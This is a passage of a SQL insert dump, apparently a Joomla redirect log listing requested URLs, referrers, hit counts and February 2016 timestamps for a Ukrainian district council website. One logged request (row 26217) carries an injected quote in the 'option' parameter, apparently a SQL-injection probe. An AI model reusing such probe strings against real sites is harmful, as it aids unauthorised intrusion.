00:00:00',301),(26175,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=687:2012-05-24-11-21-04&Itemid=&lang=ru&option=com_content&view=article','','','',25,0,'2016-02-21 23:43:49','0000-00-00 00:00:00',301),(26176,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=466:--------l-r------2011-&Itemid=70&lang=uk&option=com_content&view=article','','','',22,0,'2016-02-21 23:43:58','0000-00-00 00:00:00',301),(26177,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1289:2014-04-23-06-53-01&Itemid=17&lang=en&option=com_content&view=article','','','',2,0,'2016-02-21 23:55:01','0000-00-00 00:00:00',301),(26178,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=941:2013-02-27-14-30-15&Itemid=&lang=en&option=com_content&view=article','','','',10,0,'2016-02-21 23:58:24','0000-00-00 00:00:00',301),(26179,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=991:2013-04-22-08-24-54&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-02-22 00:00:07','0000-00-00 00:00:00',301),(26180,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1004:2013-05-04-11-41-00&Itemid=0&lang=ru&option=com_content&view=article','','','',22,0,'2016-02-22 00:02:26','0000-00-00 00:00:00',301),(26181,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=976:2013-03-21-18-42-06&Itemid=0&lang=ru&option=com_content&view=article','','','',23,0,'2016-02-22 00:06:32','0000-00-00 00:00:00',301),(26182,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=413:-2011-2012-&Itemid=72&lang=en&option=com_content&view=article','','','',22,0,'2016-02-22 00:07:00','0000-00-00 00:00:00',301),(26183,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=466:-l-r-2011-&Itemid=73&lang=ru&option=com_content&view=article','','','',10,0,'2016-02-22 00:07:11','0000-00-00 00:00:00',301),(26184,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=753:2012-09-05-09-48-36&Itemid=&lang=ru&option=com_content&view=article','','','',18,0,'2016-02-22 00:07:13','0000-00-00 00:00:00',301),(26185,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=830:2012-11-27-08-09-31&Itemid=0&lang=uk&option=com_content&view=article','','','',32,0,'2016-02-22 00:07:26','0000-00-00 00:00:00',301),(26186,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1213:2014-02-14-13-53-12&Itemid=14&lang=en&option=com_content&view=article','','','',11,0,'2016-02-22 00:07:30','0000-00-00 00:00:00',301),(26187,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1286:2014-04-23-06-48-27&Itemid=17&lang=uk&option=com_content&view=article','','','',26,0,'2016-02-22 00:07:33','0000-00-00 00:00:00',301),(26188,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?catid=58&id=1293:-2014-&lang=ru','','','',3,0,'2016-02-22 00:07:36','0000-00-00 00:00:00',301),(26189,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1102:2013-10-03-08-08-33&Itemid=0&lang=uk&option=com_content&view=article','','','',10,0,'2016-02-22 00:07:37','0000-00-00 00:00:00',301),(26190,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1221:2014-02-22-08-09-27&Itemid=&lang=en&option=com_content&view=article','','','',30,0,'2016-02-22 00:07:39','0000-00-00 00:00:00',301),(26191,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=18:2010-06-06-10-06-41&Itemid=0&lang=ru&option=com_content&view=article','','','',33,0,'2016-02-22 00:09:45','0000-00-00 00:00:00',301),(26192,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=975:-2012-2015-&Itemid=88&lang=en&option=com_content&view=article','','','',33,0,'2016-02-22 00:09:49','0000-00-00 00:00:00',301),(26193,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1004:2013-05-04-11-41-00&lang=en&option=com_content&view=article','','','',9,0,'2016-02-22 00:57:25','0000-00-00 00:00:00',301),(26194,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=956:2013-03-07-14-51-33&lang=ru&option=com_content&view=article','','','',6,0,'2016-02-22 00:57:29','0000-00-00 00:00:00',301),(26195,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=892:2013-01-08-13-26-18&lang=ru&option=com_content&view=article','','','',6,0,'2016-02-22 00:57:30','0000-00-00 00:00:00',301),(26196,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-?start=15','','','',6,0,'2016-02-22 01:02:11','0000-00-00 00:00:00',301),(26197,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1004-2013-05-04-11-41-00?lang=en','','','',7,0,'2016-02-22 01:04:33','0000-00-00 00:00:00',301),(26198,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1004-2013-05-04-11-41-00?lang=ru','','','',6,0,'2016-02-22 01:04:40','0000-00-00 00:00:00',301),(26199,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/978--6612-?Itemid=0&lang=uk','','','',7,0,'2016-02-22 01:05:22','0000-00-00 00:00:00',301),(26200,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=1106:-qq','','','',7,0,'2016-02-22 01:07:04','0000-00-00 00:00:00',301),(26201,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/956-2013-03-07-14-51-33?lang=ru','','','',5,0,'2016-02-22 01:11:49','0000-00-00 00:00:00',301),(26202,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/825--q-q?lang=uk','','','',1,0,'2016-02-22 01:14:14','0000-00-00 00:00:00',301),(26203,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/825--q-q?lang=en','','','',1,0,'2016-02-22 01:14:17','0000-00-00 00:00:00',301),(26204,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/941-2013-02-27-14-30-15?Itemid=0&lang=en','','','',1,0,'2016-02-22 01:14:22','0000-00-00 00:00:00',301),(26205,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/687-2012-05-24-11-21-04?Itemid=0&lang=ru','','','',7,0,'2016-02-22 01:14:23','0000-00-00 00:00:00',301),(26206,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/892-2013-01-08-13-26-18?lang=ru','','','',5,0,'2016-02-22 01:14:24','0000-00-00 00:00:00',301),(26207,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/745-2012-07-30-09-12-07?lang=uk','','','',1,0,'2016-02-22 01:14:30','0000-00-00 00:00:00',301),(26208,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/15-2010-06-05-12-55-45/---1932-33-/1106--qq?Itemid=0&lang=uk','','','',8,0,'2016-02-22 01:39:49','0000-00-00 00:00:00',301),(26209,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/990--2013-?Itemid=0&lang=uk','','','',10,0,'2016-02-22 01:39:50','0000-00-00 00:00:00',301),(26210,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/753-2012-09-05-09-48-36?Itemid=0&lang=ru','','','',2,0,'2016-02-22 01:39:58','0000-00-00 00:00:00',301),(26211,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/830-2012-11-27-08-09-31?Itemid=0&lang=en','','','',8,0,'2016-02-22 01:40:02','0000-00-00 00:00:00',301),(26212,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=892:2013-01-08-13-26-18','','','',3,0,'2016-02-22 01:40:03','0000-00-00 00:00:00',301),(26213,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=941:2013-02-27-14-30-15','','','',3,0,'2016-02-22 01:40:07','0000-00-00 00:00:00',301),(26214,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=978:-6612-','','','',3,0,'2016-02-22 01:40:08','0000-00-00 00:00:00',301),(26215,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1173-2014-01-15-10-37-18?Itemid=0&lang=ru','','','',7,0,'2016-02-22 01:40:12','0000-00-00 00:00:00',301),(26216,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=466:-l-r-2011-&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2016-02-22 07:28:23','0000-00-00 00:00:00',301),(26217,'http://www.malyn-rayrada.org.ua/index.php?option=com_content\'A=0&view=article&id=1:2010-06-05-13-18-17&catid=9:2010-06-05-12-55-45&Itemid=11&lang=en','','http://www.malyn-rayrada.org.ua/index.php?option=com_content\'A=0&view=article&id=1:2010-06-05-13-18-17&catid=9:2010-06-05-12-55-45&Itemid=11&lang=en','',1,0,'2016-02-22 08:05:24','0000-00-00 00:00:00',301),(26218,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=568:-2011-&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-22 10:11:33','0000-00-00 00:00:00',301),(26219,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1059:2013-07-24-05-42-15&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-02-22 10:44:38','0000-00-00 00:00:00',301),(26220,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43:--25072012-&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',3,0,'2016-02-22 10:49:56','0000-00-00 00:00:00',301),(26221,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=802:-i-i-i-i-i&lang=en&option=com_content&view=article','','','',1,0,'2016-02-22 11:58:20','0000-00-00 00:00:00',301),(26222,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/729--l20-r?lang=ru','','','',1,0,'2016-02-22 11:59:17','0000-00-00 00:00:00',301),(26223,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=970:-90-&Itemid=&lang=ru&option=com_content&view=article','','','',9,0,'2016-02-22 12:43:07','0000-00-00 00:00:00',301),(26224,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=30&layout=blog&Itemid=61&lang=ru','','','',1,0,'2016-02-22 13:15:32','0000-00-00 00:00:00',301),(26225,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=581:2012-02-27-13-13-19&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-22 13:20:56','0000-00-00 00:00:00',301),(26226,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1098:2013-09-25-09-34-57&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-22 17:58:13','0000-00-00 00:00:00',301),(26227,'http://malyn-rayrada.org.ua/index.php?Itemid=72&id=37:--21102011-&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-02-22 19:00:33','0000-00-00 00:00:00',301),(26228,'http://malyn-rayrada.org.ua/index.php?Itemid=72&id=37:--21102011-&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-02-22 19:25:09','0000-00-00 00:00:00',301),(26229,'http://www.malyn-rayrada.org.ua/index.php?option=com_easyblog&view=dashboard&layout=entries','','','',7,0,'2016-02-22 19:25:49','0000-00-00 00:00:00',301),(26230,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=428:-2012-&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-22 19:37:31','0000-00-00 00:00:00',301),(26231,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=333:-2011-&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-22 22:25:31','0000-00-00 00:00:00',301),(26232,'http://malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=867:2012-12-14-10-13-30&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-22 22:38:33','0000-00-00 00:00:00',301),(26233,'http://malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=704:-20-2011-108-l-r-&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-22 23:15:58','0000-00-00 00:00:00',301),(26234,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=421:2011-09-30-14-14-22&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-22 23:38:33','0000-00-00 00:00:00',301),(26235,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=568:-2011-&lang=ru&option=com_content&view=article','','','',4,0,'2016-02-22 23:57:01','0000-00-00 00:00:00',301),(26236,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&id=56:--03022014-&lang=ru&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-02-23 03:28:49','0000-00-00 00:00:00',301),(26237,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=462:-2012-&Itemid=73&lang=uk&option=com_content&view=article','','','',5,0,'2016-02-23 04:53:02','0000-00-00 00:00:00',301),(26238,'http://malyn-rayrada.org.ua/index.php?catid=11&id=745:2012-07-30-09-12-07&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-23 05:04:23','0000-00-00 00:00:00',301),(26239,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-53-35/951-1','','','',1,0,'2016-02-23 05:06:05','0000-00-00 00:00:00',301),(26240,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=209:2010-12-15-14-27-50&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-23 05:42:48','0000-00-00 00:00:00',301),(26241,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/941-2013-02-27-14-30-15?lang=uk&Itemid=0','','','',1,0,'2016-02-23 06:05:02','0000-00-00 00:00:00',301),(26242,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=863:------qq&lang=en&option=com_content&view=article','','','',1,0,'2016-02-23 07:21:35','0000-00-00 00:00:00',301),(26243,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=905:-2012-2015-&Itemid=86&lang=uk&option=com_content&view=article','','','',5,0,'2016-02-23 08:23:07','0000-00-00 00:00:00',301),(26244,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=786:-5-18112009-429-l-r&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-23 08:41:41','0000-00-00 00:00:00',301),(26245,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1181:2014-01-22-06-06-13&lang=uk&option=com_content&view=article','','','',1,0,'2016-02-23 10:02:55','0000-00-00 00:00:00',301),(26246,'http://malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=552:2012-01-26-12-47-12&lang=uk&option=com_content&view=article','','','',1,0,'2016-02-23 10:51:55','0000-00-00 00:00:00',301),(26247,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=741:---------l----r&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-23 11:30:34','0000-00-00 00:00:00',301),(26248,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=583:-l-lr&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-23 12:24:08','0000-00-00 00:00:00',301),(26249,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1041-2013-07-02-13-55-38?lang=en&Itemid=0','','','',1,0,'2016-02-23 13:28:52','0000-00-00 00:00:00',301),(26250,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=845:-2012-2013-&Itemid=85&lang=ru&option=com_content&view=article','','http://yandex.ua/clck/jsredir?from=yandex.ua%3Bsearch%2F%3Bweb%3B%3B&text=&etext=973.XjmeP4CS_eyr5kDCszYnSb0vsJxPQNNSwfB9fPa3sL30K4qdEZ-t4n-uBJao27JUl','',1,0,'2016-02-23 13:42:51','0000-00-00 00:00:00',301),(26251,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=919:2013-01-31-10-15-40&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-02-23 14:01:31','0000-00-00 00:00:00',301),(26252,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/813-2012-11-12-16-44-40?lang=ru','','','',1,0,'2016-02-23 14:21:21','0000-00-00 00:00:00',301),(26253,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1082:-2012-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-23 14:37:05','0000-00-00 00:00:00',301),(26254,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=772:-2011-2012-&Itemid=84&lang=en&option=com_content&view=article','','','',8,0,'2016-02-23 17:42:11','0000-00-00 00:00:00',301),(26255,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=597:-l-r-2011-&lang=ru&option=com_content&view=article','','','',4,0,'2016-02-23 18:03:08','0000-00-00 00:00:00',301),(26256,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&id=54:--29112013-&lang=en&layout=blog&option=com_content&view=category','','http://go.mail.ru/search?frc=809026&gp=809026&q=%D0%B2%D0%B8%D0%BA%D0%BE%D1%80%D0%B8%D1%81%D1%82%D0%B0%D0%BD%D0%BD%D1%8F%20%20%D0%BD%D0%B5%D1%80%D0%BE','',4,0,'2016-02-23 20:27:02','0000-00-00 00:00:00',301),(26257,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1066:-23-&Itemid=&lang=uk&option=com_content&view=article','','','',4,0,'2016-02-23 21:03:22','0000-00-00 00:00:00',301),(26258,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&id=42:--16052012-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-02-23 21:28:03','0000-00-00 00:00:00',301),(26259,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1257-pro-rajonnu-tsilovu-sotsialnu-programu-protidiji-vil-infektsiji-snidu-na-2015-2018-roki','','','',1,0,'2016-02-23 21:45:54','0000-00-00 00:00:00',301),(26260,'http://www.malyn-rayrada.org.ua/index.php/513-za-materialami-zvernen-rajonnoi-radi_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-23 21:50:14','0000-00-00 00:00:00',301),(26261,'http://malyn-rayrada.org.ua/attachments/article/26/history malyn region2.PDF','','','',1,0,'2016-02-23 22:01:41','0000-00-00 00:00:00',301),(26262,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=758:--15---&lang=uk&option=com_content&view=article','','','',1,0,'2016-02-23 22:33:05','0000-00-00 00:00:00',301),(26263,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=421:2011-09-30-14-14-22&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-23 22:47:42','0000-00-00 00:00:00',301),(26264,'http://malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1073:2013-08-30-11-12-19&lang=uk&option=com_content&view=article','','','',1,0,'2016-02-23 23:00:32','0000-00-00 00:00:00',301),(26265,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=753:2012-09-05-09-48-36&Itemid=14&lang=en&option=com_content&view=article','','','',4,0,'2016-02-23 23:29:15','0000-00-00 00:00:00',301),(26266,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=879:2012-12-21-17-02-01&lang=uk&option=com_content&view=article','','','',5,0,'2016-02-24 03:07:17','0000-00-00 00:00:00',301),(26267,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=729:-l20-r&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-24 04:00:35','0000-00-00 00:00:00',301),(26268,'http://malyn-rayrada.org.ua/index.php?Itemid=64&catid=32&id=854:2012-12-11-13-40-55&lang=uk&option=com_content&view=article','','','',1,0,'2016-02-24 05:18:02','0000-00-00 00:00:00',301),(26269,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=976:2013-03-21-18-42-06&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-24 07:48:35','0000-00-00 00:00:00',301),(26270,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=1256:2014-03-27-17-22-43','','','',24,0,'2016-02-24 09:34:21','0000-00-00 00:00:00',301),(26271,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=845:-2012-2013-&Itemid=85&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-24 10:59:15','0000-00-00 00:00:00',301),(26272,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=687:2012-05-24-11-21-04&Itemid=14&lang=ru&option=com_content&view=article','','','',22,0,'2016-02-24 11:24:54','0000-00-00 00:00:00',301),(26273,'http://malyn-rayrada.org.ua/index.php?Itemid=80&id=42:--16052012-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-02-24 11:31:24','0000-00-00 00:00:00',301),(26274,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=765:-qq&lang=en&option=com_content&view=article','','','',2,0,'2016-02-24 11:53:22','0000-00-00 00:00:00',301),(26275,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1054:2013-07-19-11-38-20&Itemid=92&lang=uk&option=com_content&view=article','','','',15,0,'2016-02-24 12:07:48','0000-00-00 00:00:00',301),(26276,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1262:2014-03-31-11-36-45&Itemid=17&lang=ru&option=com_content&view=article','','','',42,0,'2016-02-24 12:07:48','0000-00-00 00:00:00',301),(26277,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/15-2010-06-05-12-55-45/---1932-33-/1106--qq?Itemid=0&lang=ru','','','',1,0,'2016-02-24 12:07:51','0000-00-00 00:00:00',301),(26278,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=1106:-qq','','','',1,0,'2016-02-24 12:07:51','0000-00-00 00:00:00',301),(26279,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=577:--------2011--&Itemid=76&lang=uk&option=com_content&view=article','','','',15,0,'2016-02-24 12:17:26','0000-00-00 00:00:00',301),(26280,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1130:2013-11-07-14-04-12&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-24 12:22:59','0000-00-00 00:00:00',301),(26281,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/957-199-?lang=ru','','','',2,0,'2016-02-24 13:06:37','0000-00-00 00:00:00',301),(26282,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/978--6612-?lang=ru','','','',2,0,'2016-02-24 13:06:48','0000-00-00 00:00:00',301),(26283,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=577:--------2011--&Itemid=76&lang=ru&option=com_content&view=article','','','',12,0,'2016-02-24 13:25:50','0000-00-00 00:00:00',301),(26284,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=957:199-&Itemid=14&lang=uk&option=com_content&view=article','','','',46,0,'2016-02-24 14:58:29','0000-00-00 00:00:00',301),(26285,'http://malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=464:2011-11-11-12-15-19&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-24 15:06:23','0000-00-00 00:00:00',301),(26286,'http://malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1209:-----2014-&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-24 15:35:09','0000-00-00 00:00:00',301),(26287,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=728:2012-06-26-07-51-10&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-24 16:27:56','0000-00-00 00:00:00',301),(26288,'http://malyn-rayrada.org.ua/attachments/390_reiting.pdf','','','',1,0,'2016-02-24 18:28:48','0000-00-00 00:00:00',301),(26289,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=462:-2012-&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-24 19:05:29','0000-00-00 00:00:00',301),(26290,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=976:2013-03-21-18-42-06','','','',19,0,'2016-02-24 19:08:39','0000-00-00 00:00:00',301),(26291,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/941-2013-02-27-14-30-15?lang=ru','','','',2,0,'2016-02-24 20:37:54','0000-00-00 00:00:00',301),(26292,'http://www.malyn-rayrada.org.ua/index.php?Itemid=8&catid=4:2010-06-05-12-51-18&id=4:-1062010&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',5,0,'2016-02-24 21:06:35','0000-00-00 00:00:00',301),(26293,'http://malyn-rayrada.org.ua/index.php/889-novini-fiskalnoji-sluzhbi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-02-24 22:22:37','0000-00-00 00:00:00',301),(26294,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/687-2012-05-24-11-21-04','','','',2,0,'2016-02-24 22:27:52','0000-00-00 00:00:00',301),(26295,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/729--l20-r','','','',2,0,'2016-02-24 22:27:57','0000-00-00 00:00:00',301),(26296,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/730-2012-07-02-05-04-18','','','',2,0,'2016-02-24 22:27:59','0000-00-00 00:00:00',301),(26297,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/731-2012-07-02-08-51-09','','','',2,0,'2016-02-24 22:28:00','0000-00-00 00:00:00',301),(26298,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/743-2012-07-26-08-11-32','','','',2,0,'2016-02-24 22:28:03','0000-00-00 00:00:00',301),(26299,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/745-2012-07-30-09-12-07','','','',2,0,'2016-02-24 22:28:05','0000-00-00 00:00:00',301),(26300,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/753-2012-09-05-09-48-36','','','',2,0,'2016-02-24 22:28:08','0000-00-00 00:00:00',301),(26301,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/813-2012-11-12-16-44-40','','','',2,0,'2016-02-24 22:28:16','0000-00-00 00:00:00',301),(26302,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/825--q-q','','','',2,0,'2016-02-24 22:28:17','0000-00-00 00:00:00',301),(26303,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/829-24-1600-l-r','','','',2,0,'2016-02-24 22:28:19','0000-00-00 00:00:00',301),(26304,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/830-2012-11-27-08-09-31','','','',2,0,'2016-02-24 22:28:21','0000-00-00 00:00:00',301),(26305,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/919-2013-01-31-10-15-40','','','',2,0,'2016-02-24 22:28:33','0000-00-00 00:00:00',301),(26306,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/939--18-','','','',2,0,'2016-02-24 22:28:37','0000-00-00 00:00:00',301),(26307,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/941-2013-02-27-14-30-15','','','',2,0,'2016-02-24 22:28:39','0000-00-00 00:00:00',301),(26308,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=729:-l20-r','','','',2,0,'2016-02-24 22:28:41','0000-00-00 00:00:00',301),(26309,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=730:2012-07-02-05-04-18','','','',2,0,'2016-02-24 22:28:43','0000-00-00 00:00:00',301),(26310,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=731:2012-07-02-08-51-09','','','',2,0,'2016-02-24 22:28:46','0000-00-00 00:00:00',301),(26311,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=829:24-1600-l-r','','','',2,0,'2016-02-24 